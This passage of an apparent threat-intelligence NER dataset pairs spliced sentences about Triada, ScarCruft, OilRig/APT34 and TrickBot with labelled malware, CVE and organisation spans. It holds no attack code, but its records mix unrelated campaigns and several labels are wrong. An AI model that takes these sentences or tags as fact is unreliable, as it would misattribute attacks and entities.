"System"}, {"start": 354, "end": 361, "label": "Organization"}, {"start": 382, "end": 388, "label": "Organization"}, {"start": 410, "end": 432, "label": "Organization"}, {"start": 437, "end": 461, "label": "Organization"}]} {"text": "But our researchers have predicted that these small Trojans would certainly be used to download some really bad malware that can actually harm the owners of the infected devices . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . 
In recent OilRig attacks , the threat actors purport to be legitimate service providers offering service and technical troubleshooting as a social engineering theme in their spear-phishing attacks .", "spans": [{"start": 218, "end": 229, "label": "System"}, {"start": 251, "end": 264, "label": "Vulnerability"}, {"start": 280, "end": 298, "label": "System"}, {"start": 339, "end": 345, "label": "Organization"}, {"start": 360, "end": 388, "label": "Organization"}, {"start": 441, "end": 459, "label": "Organization"}]} {"text": "And that \u2019 s exactly what has happened recently . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' .", "spans": [{"start": 50, "end": 63, "label": "Organization"}, {"start": 87, "end": 112, "label": "Vulnerability"}, {"start": 160, "end": 187, "label": "Malware"}, {"start": 190, "end": 217, "label": "Malware"}, {"start": 298, "end": 306, "label": "Malware"}]} {"text": "Small Trojans like Leech , Ztorg and Gopro now download one of the most advanced mobile Trojans our malware analysts have ever encountered \u2014 we call it Triada . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 .", "spans": [{"start": 19, "end": 24, "label": "Malware"}, {"start": 27, "end": 32, "label": "Malware"}, {"start": 37, "end": 42, "label": "Malware"}, {"start": 152, "end": 158, "label": "Malware"}, {"start": 165, "end": 170, "label": "Malware"}, {"start": 194, "end": 224, "label": "Vulnerability"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 281, "end": 293, "label": "Malware"}, {"start": 427, "end": 443, "label": "Organization"}]} {"text": "Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and exists mostly in the device \u2019 s RAM , which makes it extremely hard to detect . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 201, "end": 211, "label": "Organization"}, {"start": 241, "end": 276, "label": "Vulnerability"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 457, "end": 480, "label": "Organization"}]} {"text": "The dark ways of the Triada Once downloaded and installed , the Triada Trojan first tries to collect some information about the system \u2014 like the device model , the OS version , the amount of the SD card space , the list of the installed applications and other things . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . 
Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable .", "spans": [{"start": 21, "end": 27, "label": "Malware"}, {"start": 64, "end": 70, "label": "Malware"}, {"start": 381, "end": 386, "label": "Vulnerability"}, {"start": 389, "end": 415, "label": "Vulnerability"}, {"start": 508, "end": 525, "label": "Malware"}, {"start": 556, "end": 566, "label": "System"}]} {"text": "Then it sends all that information to the Command & Control server . Adobe Flash Player exploit . FireEye also reported on these attacks in a May 22 blog post .", "spans": [{"start": 69, "end": 95, "label": "Vulnerability"}, {"start": 98, "end": 105, "label": "Organization"}]} {"text": "We have detected a total of 17 C & C servers on 4 different domains , which probably means the bad guys are quite familiar with what redundancy is . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 201, "end": 217, "label": "Vulnerability"}, {"start": 220, "end": 233, "label": "Vulnerability"}, {"start": 291, "end": 299, "label": "Malware"}, {"start": 320, "end": 334, "label": "Malware"}, {"start": 363, "end": 376, "label": "Malware"}]} {"text": "The C & C server then responds with a configuration file , containing the personal identification number for the device and some settings \u2014 the time interval between contacting the server , the list of modules to be installed and so on . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . 
The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries .", "spans": [{"start": 273, "end": 293, "label": "Vulnerability"}, {"start": 296, "end": 309, "label": "Vulnerability"}, {"start": 359, "end": 367, "label": "Malware"}, {"start": 487, "end": 489, "label": "System"}, {"start": 508, "end": 512, "label": "Malware"}, {"start": 517, "end": 520, "label": "Malware"}]} {"text": "After the modules are installed they are deployed to the short term memory and deleted from the device storage , which makes the Trojan a lot harder to catch . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . Helminth executable samples send artifacts within network beacons to its C2 server that the Trojan refers to as a ' Group ' and ' Name ' .", "spans": [{"start": 160, "end": 169, "label": "Organization"}, {"start": 208, "end": 228, "label": "Vulnerability"}, {"start": 231, "end": 244, "label": "Vulnerability"}, {"start": 290, "end": 298, "label": "Malware"}, {"start": 363, "end": 365, "label": "System"}, {"start": 382, "end": 388, "label": "Malware"}]} {"text": "There are two more reasons why Triada is so hard to detect and why it had impressed our researchers so much . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . 
It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 159, "end": 168, "label": "Organization"}, {"start": 202, "end": 219, "label": "Vulnerability"}, {"start": 418, "end": 436, "label": "Organization"}, {"start": 441, "end": 459, "label": "Organization"}]} {"text": "First , it modifies the Zygote process . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries .", "spans": [{"start": 24, "end": 30, "label": "System"}, {"start": 104, "end": 117, "label": "Vulnerability"}, {"start": 121, "end": 126, "label": "System"}, {"start": 337, "end": 355, "label": "Organization"}, {"start": 360, "end": 378, "label": "Organization"}]} {"text": "Zygote is the core process in the Android OS that is used as a template for every application , which means that once the Trojan gets into Zygote , it becomes a part of literally every app that is launched on the device . Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . 
This suggests that the threat actors are not only focused on financial organizations , as their target set could include other industries as well .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 34, "end": 41, "label": "System"}, {"start": 139, "end": 145, "label": "System"}, {"start": 261, "end": 296, "label": "Vulnerability"}, {"start": 358, "end": 364, "label": "Organization"}, {"start": 389, "end": 412, "label": "Organization"}]} {"text": "Triada : organized crime on Android Second , it substitutes the system functions and conceals its modules from the list of the running processes and installed apps . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 28, "end": 35, "label": "System"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 292, "end": 297, "label": "System"}]} {"text": "So the system doesn \u2019 t see any strange processes running and thus does not cry the alarm . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir .", "spans": [{"start": 160, "end": 173, "label": "Vulnerability"}, {"start": 297, "end": 311, "label": "Organization"}]} {"text": "Those are not the only system functions Triada modifies . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . 
The mydomain1110.com domain did not appear to reuse any of the previously observed WHOIS data artifacts , but did still give a geolocation of Tehran in addition to the use of an email address linked to other domains thematically similar to the know command and control domains and are potentially related .", "spans": [{"start": 40, "end": 46, "label": "Malware"}, {"start": 99, "end": 113, "label": "Vulnerability"}, {"start": 400, "end": 405, "label": "System"}]} {"text": "As our researchers discovered , it also lays its hands on the outgoing SMS and filters the incoming ones . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload .", "spans": [{"start": 135, "end": 157, "label": "Vulnerability"}, {"start": 455, "end": 461, "label": "Organization"}]} {"text": "That is actually how the bad guys decided to monetize the Trojan . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . 
The two variants of Helminth do require different delivery methods , with the script variant relying on an Excel spreadsheet for delivery , while the executable variant is more traditional in the fact that it can be installed without a delivery document .", "spans": [{"start": 82, "end": 95, "label": "Organization"}, {"start": 161, "end": 169, "label": "Vulnerability"}, {"start": 223, "end": 236, "label": "Organization"}, {"start": 289, "end": 297, "label": "Malware"}]} {"text": "Some applications rely on SMS when it comes to in-app purchases \u2014 the transaction data is transferred via a short text message . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity .", "spans": [{"start": 129, "end": 138, "label": "Organization"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 194, "end": 202, "label": "Vulnerability"}, {"start": 205, "end": 218, "label": "Vulnerability"}]} {"text": "The main reason for developers to choose SMS over traditional payments via Internet is that in the case with SMS no Internet connection is required . Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . 
Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States .", "spans": [{"start": 215, "end": 228, "label": "Vulnerability"}, {"start": 231, "end": 244, "label": "Vulnerability"}, {"start": 477, "end": 501, "label": "Organization"}]} {"text": "Users do not see those SMS because they are processed not by the SMS app , but by the app that has initiated the transaction \u2014 e.g a free-to-play game . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims .", "spans": [{"start": 235, "end": 243, "label": "Vulnerability"}, {"start": 244, "end": 257, "label": "Vulnerability"}, {"start": 334, "end": 340, "label": "System"}]} {"text": "Triada \u2019 s functionality allows it to modify those messages , so the money is sent not to some app developer , but to the malware operators . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . 
In addition to these instances , multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 142, "end": 154, "label": "Organization"}, {"start": 181, "end": 212, "label": "System"}, {"start": 236, "end": 247, "label": "Organization"}, {"start": 274, "end": 294, "label": "Vulnerability"}, {"start": 339, "end": 359, "label": "Organization"}, {"start": 412, "end": 428, "label": "Malware"}]} {"text": "Triada steals the money either from the users \u2014 if they haven \u2019 t succeeded in purchasing whatever they wanted , or from the app developers , in case the user has completed the purchase successfully . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 201, "end": 213, "label": "Organization"}, {"start": 244, "end": 265, "label": "Vulnerability"}, {"start": 421, "end": 423, "label": "System"}]} {"text": "For now , that is the only way how cybercriminals can profit from Triada , but don \u2019 t forget that it \u2019 s a modular Trojan , so it can be turned into literally everything on one command from the C & C server . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 
14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": [{"start": 66, "end": 72, "label": "Malware"}, {"start": 221, "end": 235, "label": "Vulnerability"}, {"start": 305, "end": 318, "label": "Vulnerability"}, {"start": 378, "end": 391, "label": "Organization"}, {"start": 404, "end": 432, "label": "Vulnerability"}, {"start": 458, "end": 467, "label": "Organization"}, {"start": 487, "end": 501, "label": "Vulnerability"}, {"start": 522, "end": 529, "label": "Organization"}, {"start": 542, "end": 550, "label": "Organization"}, {"start": 560, "end": 567, "label": "Vulnerability"}, {"start": 576, "end": 592, "label": "System"}, {"start": 619, "end": 642, "label": "Organization"}]} {"text": "Fighting organized crime in your phone One of the main problems with Triada is that it can potentially hurt a LOT of people . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives .", "spans": [{"start": 69, "end": 75, "label": "Malware"}, {"start": 153, "end": 160, "label": "Organization"}, {"start": 206, "end": 219, "label": "Vulnerability"}, {"start": 365, "end": 370, "label": "Organization"}, {"start": 381, "end": 407, "label": "Malware"}]} {"text": "As we \u2019 ve mentioned earlier , Triada is downloaded by smaller Trojans that have leveraged the access privileges . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . 
This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 292, "end": 302, "label": "Organization"}, {"start": 396, "end": 405, "label": "Organization"}, {"start": 408, "end": 418, "label": "Organization"}, {"start": 421, "end": 427, "label": "Organization"}, {"start": 430, "end": 438, "label": "Organization"}, {"start": 445, "end": 463, "label": "Organization"}]} {"text": "And our researchers estimate that in every 10 Android users 1 was attacked by either one or several of those Trojans during the second half of 2015 , so there are millions of devices with a huge possibility of being infected with Triada . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": [{"start": 46, "end": 53, "label": "System"}, {"start": 230, "end": 236, "label": "Malware"}, {"start": 339, "end": 352, "label": "Vulnerability"}, {"start": 357, "end": 370, "label": "Vulnerability"}, {"start": 569, "end": 574, "label": "Organization"}]} {"text": "So , what can you do to protect yourself from this stealthy beast ? One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . 
APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts , sometimes coupled with social engineering tactics .", "spans": [{"start": 99, "end": 121, "label": "Vulnerability"}, {"start": 152, "end": 160, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 183, "end": 210, "label": "Malware"}, {"start": 262, "end": 282, "label": "Malware"}]} {"text": "1 . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . We believe APT34 is involved in a long-term Cyber Espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 34, "end": 49, "label": "Vulnerability"}, {"start": 134, "end": 139, "label": "Organization"}]} {"text": "Never forget to update your system . The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools\u2014EternalRomance and EternalSynergy\u2014that were also released as part of the Shadow Brokers leak . In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware .", "spans": [{"start": 56, "end": 69, "label": "Vulnerability"}, {"start": 248, "end": 262, "label": "Organization"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 432, "end": 438, "label": "Malware"}, {"start": 439, "end": 446, "label": "Malware"}]} {"text": "It turns out that those smaller Trojans face serious problems trying to get root access on Android 4.4.4 and above , because a lot of vulnerabilities were patched in these versions . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . 
In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware .", "spans": [{"start": 91, "end": 104, "label": "System"}, {"start": 197, "end": 210, "label": "Vulnerability"}, {"start": 253, "end": 266, "label": "Vulnerability"}, {"start": 304, "end": 309, "label": "Organization"}, {"start": 355, "end": 380, "label": "Malware"}, {"start": 394, "end": 402, "label": "Malware"}, {"start": 480, "end": 491, "label": "Malware"}]} {"text": "So if you have Android 4.4.4 or some more recent version of this OS on your device , your chances of getting infected with Triada are significantly lower . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . APT34 loosely aligns with public reporting related to the group \" OilRig \" .", "spans": [{"start": 15, "end": 28, "label": "System"}, {"start": 123, "end": 129, "label": "Malware"}, {"start": 210, "end": 224, "label": "Organization"}, {"start": 286, "end": 294, "label": "Organization"}, {"start": 303, "end": 308, "label": "Organization"}, {"start": 369, "end": 375, "label": "Organization"}]} {"text": "Yet our statistics says that about 60 % of Android users are still sitting with Android 4.4.2 and below . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . 
The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 80, "end": 103, "label": "System"}, {"start": 155, "end": 163, "label": "Organization"}, {"start": 164, "end": 179, "label": "Vulnerability"}, {"start": 295, "end": 304, "label": "Indicator"}, {"start": 320, "end": 333, "label": "Vulnerability"}]} {"text": "Triada : organized crime on Android 2 . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 28, "end": 35, "label": "System"}, {"start": 40, "end": 53, "label": "Vulnerability"}, {"start": 89, "end": 109, "label": "Malware"}, {"start": 114, "end": 133, "label": "Malware"}, {"start": 225, "end": 230, "label": "Organization"}, {"start": 252, "end": 268, "label": "System"}, {"start": 283, "end": 297, "label": "Vulnerability"}, {"start": 308, "end": 316, "label": "Malware"}, {"start": 321, "end": 332, "label": "Malware"}]} {"text": "Better not to take any chances at all , no matter which version of the OS you use . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . The vulnerability was patched by Microsoft on Nov 14 , 2017 .", "spans": [{"start": 89, "end": 92, "label": "Malware"}, {"start": 112, "end": 125, "label": "Vulnerability"}, {"start": 129, "end": 141, "label": "Malware"}, {"start": 177, "end": 186, "label": "Organization"}]} {"text": "So we recommend installing an anti-virus solution on your Android device . At this time , we do not believe that the attackers found a new ASA exploit . 
The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": [{"start": 90, "end": 92, "label": "Organization"}, {"start": 117, "end": 126, "label": "Organization"}, {"start": 139, "end": 142, "label": "Vulnerability"}, {"start": 143, "end": 150, "label": "Vulnerability"}, {"start": 189, "end": 204, "label": "Malware"}, {"start": 207, "end": 219, "label": "Malware"}, {"start": 239, "end": 248, "label": "Organization"}]} {"text": "Kaspersky Internet Security for Android detects all three of Triada \u2019 s modules , so it can save your money from cybercriminals that are behind Triada . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": [{"start": 0, "end": 27, "label": "System"}, {"start": 32, "end": 39, "label": "System"}, {"start": 61, "end": 67, "label": "Malware"}, {"start": 144, "end": 150, "label": "Malware"}, {"start": 168, "end": 174, "label": "Organization"}, {"start": 188, "end": 201, "label": "Vulnerability"}, {"start": 413, "end": 418, "label": "Organization"}, {"start": 509, "end": 522, "label": "Vulnerability"}, {"start": 527, "end": 541, "label": "Vulnerability"}]} {"text": "Just don \u2019 t forget that the scan does not run automatically in the free version . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . 
The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": [{"start": 229, "end": 235, "label": "Malware"}, {"start": 255, "end": 269, "label": "Vulnerability"}, {"start": 273, "end": 286, "label": "Vulnerability"}, {"start": 293, "end": 305, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 320, "end": 332, "label": "Organization"}]} {"text": "But all in all Triada is yet another example of a really bad trend : malware developers are taking Android seriously , and the latest samples are almost as complex and hard to withstand , as their Windows-based kin . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region .", "spans": [{"start": 15, "end": 21, "label": "Malware"}, {"start": 99, "end": 106, "label": "System"}, {"start": 197, "end": 210, "label": "System"}, {"start": 269, "end": 278, "label": "Malware"}, {"start": 299, "end": 312, "label": "Vulnerability"}, {"start": 381, "end": 386, "label": "Organization"}]} {"text": "The only good way to fight all these threats is to be proactive , and so a good security solution is a must . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . 
The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": [{"start": 110, "end": 117, "label": "Organization"}, {"start": 196, "end": 199, "label": "Malware"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 247, "end": 259, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 274, "end": 286, "label": "Organization"}]} {"text": "TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany March 24 , 2020 IBM X-Force researchers analyzed an Android malware app that \u2019 s likely being pushed to infected users by the TrickBot Trojan . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 79, "end": 90, "label": "Organization"}, {"start": 115, "end": 122, "label": "System"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 207, "end": 220, "label": "Vulnerability"}, {"start": 298, "end": 310, "label": "Organization"}]} {"text": "This app , dubbed \u201c TrickMo \u201d by our team , is designed to bypass second factor and strong authentication pushed to bank customers when they need to authorize a transaction . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . 
Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East .", "spans": [{"start": 20, "end": 27, "label": "Malware"}, {"start": 203, "end": 217, "label": "Vulnerability"}, {"start": 222, "end": 235, "label": "Vulnerability"}, {"start": 242, "end": 252, "label": "System"}, {"start": 301, "end": 307, "label": "Organization"}, {"start": 485, "end": 492, "label": "Organization"}, {"start": 526, "end": 538, "label": "Organization"}, {"start": 569, "end": 586, "label": "Organization"}]} {"text": "While it \u2019 s not the first of its kind , this Android malware app is more sophisticated than similar apps and possesses interesting features that enable its operators to steal transaction authorization codes from victims who download the app . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented .", "spans": [{"start": 46, "end": 53, "label": "System"}, {"start": 334, "end": 347, "label": "Organization"}, {"start": 366, "end": 379, "label": "Vulnerability"}, {"start": 389, "end": 403, "label": "System"}, {"start": 417, "end": 439, "label": "Malware"}, {"start": 474, "end": 486, "label": "Organization"}]} {"text": "According to our research , TrickMo is still under active development as we expect to see frequent changes and updates . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . 
The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 158, "end": 171, "label": "Organization"}, {"start": 224, "end": 237, "label": "Vulnerability"}, {"start": 363, "end": 382, "label": "Malware"}, {"start": 390, "end": 399, "label": "Malware"}, {"start": 427, "end": 439, "label": "Organization"}, {"start": 448, "end": 471, "label": "Organization"}, {"start": 476, "end": 483, "label": "Organization"}]} {"text": "While it can be used anywhere and target any bank or region , at this time , we are seeing it deployed specifically in Germany . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation .", "spans": [{"start": 195, "end": 209, "label": "Vulnerability"}, {"start": 276, "end": 290, "label": "Malware"}, {"start": 321, "end": 333, "label": "Malware"}, {"start": 472, "end": 484, "label": "Organization"}, {"start": 494, "end": 511, "label": "Malware"}, {"start": 574, "end": 592, "label": "Malware"}]} {"text": "Germany is one of the first attack turfs TrickBot spread to when it first emerged in 2016 . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . 
All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East .", "spans": [{"start": 41, "end": 49, "label": "Malware"}, {"start": 179, "end": 192, "label": "Vulnerability"}, {"start": 210, "end": 235, "label": "Malware"}, {"start": 238, "end": 250, "label": "Malware"}, {"start": 391, "end": 408, "label": "Organization"}]} {"text": "In 2020 , it appears that TrickBot \u2019 s vast bank fraud is an ongoing project that helps the gang monetize compromised accounts . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT Maudi Surveillance Operation which was previously reported in 2013 . This latest attack consisted of three waves between May and June 2018 .", "spans": [{"start": 26, "end": 34, "label": "Malware"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 274, "end": 279, "label": "Organization"}]} {"text": "First Signs in September 2019 In September 2019 , a tweet by CERT-Bund caught the attention of the IBM Trusteer Mobile Security Research team . specifically CVE-2018-0798 , before downloading subsequent payloads . The OilRig group continues to be a persistent adversary group in the Middle East region .", "spans": [{"start": 61, "end": 70, "label": "Organization"}, {"start": 99, "end": 136, "label": "Organization"}, {"start": 157, "end": 170, "label": "Vulnerability"}, {"start": 218, "end": 230, "label": "Organization"}]} {"text": "The tweet stated that TrickBot , a well-known banking Trojan owned by an organized cybercrime gang , uses man-in-the-browser ( MITB ) web injects in online banking sessions to ask infected users for their mobile phone number and device type . 
Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . APT34 are involved in long-term cyber espionage operations largely focused on the Middle East .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 250, "end": 267, "label": "Organization"}, {"start": 366, "end": 381, "label": "Vulnerability"}, {"start": 449, "end": 454, "label": "Organization"}]} {"text": "Machine translation of this tweet reads : \u201c Watch out for online banking : Emotet reloads TrickBot . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications .", "spans": [{"start": 75, "end": 81, "label": "Malware"}, {"start": 90, "end": 98, "label": "Malware"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 153, "end": 160, "label": "Vulnerability"}, {"start": 170, "end": 183, "label": "Vulnerability"}, {"start": 313, "end": 322, "label": "Organization"}, {"start": 325, "end": 335, "label": "Organization"}, {"start": 338, "end": 344, "label": "Organization"}, {"start": 347, "end": 355, "label": "Organization"}, {"start": 362, "end": 380, "label": "Organization"}]} {"text": "On infected PCs , TrickBot displays a query for the mobile phone number and the device type used for banking and then prompts users to install an alleged security app. \u201d When banking Trojans ask for this type of information , it usually means the next step will be an attempt to infect the victim \u2019 s mobile device . We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . 
